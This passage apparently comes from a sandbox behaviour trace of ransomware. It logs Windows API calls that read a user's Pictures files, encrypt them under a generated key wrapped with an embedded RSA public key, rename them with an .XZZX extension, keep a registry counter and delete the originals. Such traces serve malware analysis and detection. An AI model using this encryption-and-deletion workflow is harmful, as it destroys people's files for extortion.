LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0123.019] OutputDebugStringW (lpOutputString="end") [0123.019] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x80\x8cÊ\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0123.020] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0123.020] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3ce2060) returned 1 [0123.021] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce2060, dwCertEncodingType=0x1, pInfo=0x3cb2128*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb2158*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb2160*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3a6150) returned 1 [0123.021] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.022] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0123.022] CryptEncrypt (in: hKey=0x3a6150, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0123.022] CryptEncrypt (in: hKey=0x3a6150, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce20e8*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce20e8*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0123.022] WriteFile (in: hFile=0x5e0, lpBuffer=0x3ce20e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce20e8*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0123.022] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0123.022] WriteFile (in: hFile=0x5e0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0123.022] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0123.022] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0123.022] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x5ec) returned 0x0 [0123.022] RegQueryValueExW (in: hKey=0x5ec, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x87, lpcbData=0x434dfdc*=0x4) returned 0x0 [0123.023] RegCloseKey (hKey=0x5ec) returned 0x0 [0123.023] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x5ec) returned 0x0 [0123.023] RegSetValueExW (in: hKey=0x5ec, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x88, cbData=0x4 | out: lpData=0x434dfec*=0x88) returned 0x0 [0123.023] RegCloseKey (hKey=0x5ec) returned 0x0 [0123.023] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.023] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.024] CloseHandle (hObject=0x5e0) returned 1 [0123.025] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0123.026] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0123.026] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dcuecnaq5mY4vS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dcuecnaq5my4vs.jpg")) returned 1 [0123.028] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dcuecnaq5mY4vS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dcuecnaq5my4vs.jpg")) returned 0 Thread: id = 401 os_tid = 0x954 [0122.653] lstrcpyA (in: lpString1=0x449fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0122.653] lstrcpyW (in: lpString1=0x449f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0122.653] lstrcpyW (in: lpString1=0x449e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0122.653] SetErrorMode (uMode=0x1) returned 0x1 [0122.653] lstrcpyW (in: lpString1=0x449f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0122.653] CoCreateGuid (in: pguid=0x449e440 | out: pguid=0x449e440*(Data1=0xfcc9e4d9, Data2=0x948b, Data3=0x4774, Data4=([0]=0xbe, [1]=0x52, [2]=0x8e, [3]=0x6, [4]=0x54, [5]=0xed, [6]=0x4f, [7]=0x52))) returned 0x0 [0122.653] wsprintfW (in: param_1=0x449ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini") returned 54 [0122.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x449fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0122.653] wsprintfW (in: param_1=0x449e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX") returned 80 [0122.653] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0122.653] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini", dwFileAttributes=0x20) returned 1 [0122.654] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4 [0122.654] ReadFile (in: hFile=0x5d4, lpBuffer=0x3e0348, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x449e418, lpOverlapped=0x0 | out: lpBuffer=0x3e0348*, lpNumberOfBytesRead=0x449e418*=0x1f8, lpOverlapped=0x0) returned 1 [0122.655] CloseHandle (hObject=0x5d4) returned 1 [0122.655] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x44a0000 [0122.655] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x44b0000 [0122.656] SetErrorMode (uMode=0x1) returned 0x1 [0122.656] lstrcpyW (in: lpString1=0x449e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0122.656] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce1f50) returned 1 [0122.658] CryptGenKey (in: hProv=0x3ce1f50, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a6210) returned 1 [0123.211] CryptExportKey (in: hKey=0x3a6210, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x449e41c | out: pbData=0x0*, pdwDataLen=0x449e41c*=0x94) returned 1 [0123.211] CryptExportKey (in: hKey=0x3a6210, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x44b0000, pdwDataLen=0x449e41c | out: pbData=0x44b0000*, pdwDataLen=0x449e41c*=0x94) returned 1 [0123.211] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.211] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0123.212] CryptDestroyKey (hKey=0x3a6210) returned 1 [0123.212] CryptReleaseContext (hProv=0x3ce1fd8, dwFlags=0x0) returned 0 [0123.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\F9ECB5D32975DBFCFCC9E4D92DBFC044.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\f9ecb5d32975dbfcfcc9e4d92dbfc044.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c0 [0123.212] WriteFile (in: hFile=0x5c0, lpBuffer=0x3e0348*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x3e0348*, lpNumberOfBytesWritten=0x449e438*=0x1f8, lpOverlapped=0x0) returned 1 [0123.213] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1f8 [0123.213] WriteFile (in: hFile=0x5c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0123.213] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1fd [0123.213] WriteFile (in: hFile=0x5c0, lpBuffer=0x449f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x449f860*, lpNumberOfBytesWritten=0x449e438*=0x16, lpOverlapped=0x0) returned 1 [0123.213] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x213 [0123.213] WriteFile (in: hFile=0x5c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0123.213] SetFilePointer (in: hFile=0x5c0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x218 [0123.213] SetErrorMode (uMode=0x1) returned 0x1 [0123.213] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0123.213] OutputDebugStringW (lpOutputString="end") [0123.213] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`ÕI\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x449dbf4, pcbBinary=0x449d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x449dbf4, pcbBinary=0x449d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0123.213] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x449dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x449d3dc, pcbStructInfo=0x449d3d8 | out: pvStructInfo=0x449d3dc, pcbStructInfo=0x449d3d8) returned 1 [0123.213] CryptAcquireContextW (in: phProv=0x449d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x449d3e4*=0x3ce2280) returned 1 [0123.214] CryptImportPublicKeyInfo (in: hCryptProv=0x3ce2280, dwCertEncodingType=0x1, pInfo=0x3cb1768*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1798*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb17a0*, PublicKey.cUnusedBits=0x0), phKey=0x449d3ec | out: phKey=0x449d3ec*=0x3a6210) returned 1 [0123.214] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.215] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0123.215] CryptEncrypt (in: hKey=0x3a6210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x449d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x449d3f0*=0x80) returned 1 [0123.215] CryptEncrypt (in: hKey=0x3a6210, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3ce2308*, pdwDataLen=0x449d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3ce2308*, pdwDataLen=0x449d3e8*=0x80) returned 1 [0123.215] WriteFile (in: hFile=0x5c0, lpBuffer=0x3ce2308*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce2308*, lpNumberOfBytesWritten=0x449e438*=0x80, lpOverlapped=0x0) returned 1 [0123.215] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0123.215] WriteFile (in: hFile=0x5c0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0123.215] GetUserNameW (in: lpBuffer=0x449e1f8, pcbBuffer=0x449dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x449dfe0) returned 1 [0123.216] wsprintfW (in: param_1=0x449dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0123.216] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x449dfe4 | out: phkResult=0x449dfe4*=0x5c4) returned 0x0 [0123.216] RegQueryValueExW (in: hKey=0x5c4, lpValueName="E1010314", lpReserved=0x0, lpType=0x449dfd8, lpData=0x449dfec, lpcbData=0x449dfdc*=0x4 | out: lpType=0x449dfd8*=0x4, lpData=0x449dfec*=0x89, lpcbData=0x449dfdc*=0x4) returned 0x0 [0123.216] RegCloseKey (hKey=0x5c4) returned 0x0 [0123.216] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x449dfe8 | out: phkResult=0x449dfe8*=0x5c4) returned 0x0 [0123.216] RegSetValueExW (in: hKey=0x5c4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x449dfec*=0x8a, cbData=0x4 | out: lpData=0x449dfec*=0x8a) returned 0x0 [0123.216] RegCloseKey (hKey=0x5c4) returned 0x0 [0123.216] VirtualFree (lpAddress=0x44a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.217] VirtualFree (lpAddress=0x44b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0123.217] CloseHandle (hObject=0x5c0) returned 1 [0123.218] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0123.218] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0123.218] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini")) returned 1 [0123.219] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\desktop.ini")) returned 0 Thread: id = 402 os_tid = 0x958 [0122.965] lstrcpyA (in: lpString1=0x45ffc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0122.965] lstrcpyW (in: lpString1=0x45ff460, lpString2="diyvOkO.gif" | out: lpString1="diyvOkO.gif") returned="diyvOkO.gif" [0122.965] lstrcpyW (in: lpString1=0x45fe860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0122.965] SetErrorMode (uMode=0x1) returned 0x1 [0122.965] lstrcpyW (in: lpString1=0x45ff860, lpString2="diyvOkO.gif" | out: lpString1="diyvOkO.gif") returned="diyvOkO.gif" [0122.965] CoCreateGuid (in: pguid=0x45fe440 | out: pguid=0x45fe440*(Data1=0xf4300455, Data2=0x6cb, Data3=0x445d, Data4=([0]=0x82, [1]=0x69, [2]=0x38, [3]=0x3a, [4]=0xcd, [5]=0xba, [6]=0xe0, [7]=0x9e))) returned 0x0 [0122.965] wsprintfW (in: param_1=0x45fec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\diyvOkO.gif") returned 54 [0122.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x45ffee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0122.965] wsprintfW (in: param_1=0x45fe450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C22D6D6701D063BFF430045506304807.XZZX") returned 80 [0122.965] StrStrW (lpFirst="diyvOkO.gif", lpSrch="XZZX") returned 0x0 [0122.965] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\diyvOkO.gif", dwFileAttributes=0x20) returned 1 [0122.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\diyvOkO.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\diyvoko.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5e0 [0122.966] ReadFile (in: hFile=0x5e0, lpBuffer=0x3d0e118, nNumberOfBytesToRead=0x4c4f, lpNumberOfBytesRead=0x45fe418, lpOverlapped=0x0 | out: lpBuffer=0x3d0e118*, lpNumberOfBytesRead=0x45fe418*=0x4c4f, lpOverlapped=0x0) returned 1 [0122.967] CloseHandle (hObject=0x5e0) returned 1 [0122.967] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4600000 [0122.968] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4610000 [0122.968] SetErrorMode (uMode=0x1) returned 0x1 [0122.968] lstrcpyW (in: lpString1=0x45fe358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0122.968] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3ce1fd8) returned 1 [0122.971] CryptGenKey (in: hProv=0x3ce1fd8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a6310) returned 1 [0123.308] CryptExportKey (in: hKey=0x3a6310, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x45fe41c | out: pbData=0x0*, pdwDataLen=0x45fe41c*=0x94) returned 1 [0123.308] CryptExportKey (in: hKey=0x3a6310, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4610000, pdwDataLen=0x45fe41c | out: pbData=0x4610000*, pdwDataLen=0x45fe41c*=0x94) returned 1 [0123.308] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0123.309] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0123.309] CryptDestroyKey (hKey=0x3a6310) returned 1 [0123.309] CryptReleaseContext (hProv=0x3ce1fd8, dwFlags=0x0) returned 0 [0123.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C22D6D6701D063BFF430045506304807.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c22d6d6701d063bff430045506304807.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d8 [0123.309] WriteFile (in: hFile=0x5d8, lpBuffer=0x3d0e118*, nNumberOfBytesToWrite=0x4c4f, lpNumberOfBytesWritten=0x45fe438, lpOverlapped=0x0 | out: lpBuffer=0x3d0e118*, lpNumberOfBytesWritten=0x45fe438*=0x4c4f, lpOverlapped=0x0) returned 1 [0123.310] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c4f [0123.310] WriteFile (in: hFile=0x5d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x45fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x45fe438*=0x5, lpOverlapped=0x0) returned 1 [0123.310] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c54 [0123.310] WriteFile (in: hFile=0x5d8, lpBuffer=0x45ff860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x45fe438, lpOverlapped=0x0 | out: lpBuffer=0x45ff860*, lpNumberOfBytesWritten=0x45fe438*=0x16, lpOverlapped=0x0) returned 1 [0123.310] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c6a [0123.310] WriteFile (in: hFile=0x5d8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x45fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x45fe438*=0x5, lpOverlapped=0x0) returned 1 [0123.311] SetFilePointer (in: hFile=0x5d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x4c6f [0123.311] SetErrorMode (uMode=0x1) returned 0x1 [0123.311] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 